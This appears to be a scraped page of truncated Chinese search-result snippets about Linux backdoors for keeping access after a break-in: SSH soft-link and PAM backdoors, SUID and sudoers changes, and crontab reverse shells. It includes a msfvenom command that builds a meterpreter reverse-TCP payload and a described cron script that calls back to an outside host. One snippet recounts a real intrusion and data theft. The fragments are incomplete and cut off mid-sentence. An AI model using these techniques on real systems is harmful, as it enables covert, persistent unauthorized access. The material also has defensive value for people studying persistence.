目录 ssh软连接 添加用户 修改/etc/sudoers文件 suid后门 crontab反弹shell后门 ssh免密登录 ssh wrapper后门 inetd strace后门 协议后门 icmp ...

1 使用 WebShellKillerTool 进行网站文件扫描 能抓出一般后台漏洞文件 2 控制面板-->文件夹选项-->显示隐藏文件-->上面两个如果是勾选状态要去 ...

转载自 https://evilanne.github.io/2017/08/26/Linux后门-持续关注/ 在一次渗透中，成功获取某目标几台比较重要的机器，当时只想着获取脱库，结果动静太大被发现了，之前渗透并没太在意Linux后门，经过此次事后从Google找各种资料，一款满意 ...

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf ...

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能，保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件（名字自己改），利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano ...

在一次渗透中，成功获取某目标几台比较重要的机器，当时只想着获取脱库，结果动静太大被发现了，之前渗透并没太在意Linux维持权限，经过此次事后从Google找各种资料，一款满意的rootkit都没有，现在一直在关注这方面，但还是没有找到满意的后门，在渗透圈一个人的资源总是有限往往你全力追求 ...

SSHD软连接后门 软连接后门是sshd启用PAM认证的前提下，利用了一个PAM配置文件将sshd文件生成软连接，把名称设置为su，应用在启动中会去和PAM配置文件夹中寻找是否存在对应名称的配置信息（su）只要pam_rootok模块检测uid是0即可认证成功，这样就导致了可以使用任意密码 ...

首发先知社区: https://xz.aliyun.com/t/7902 前言 渐渐发现pam后门在实战中存在种植繁琐、隐蔽性不强等缺点，这里记录下学习pam后门相关知识和pam后门的拓展改进。 0x01 PAM Backdoor PAM是一种认证模块，PAM可以作为Linux登录验证 ...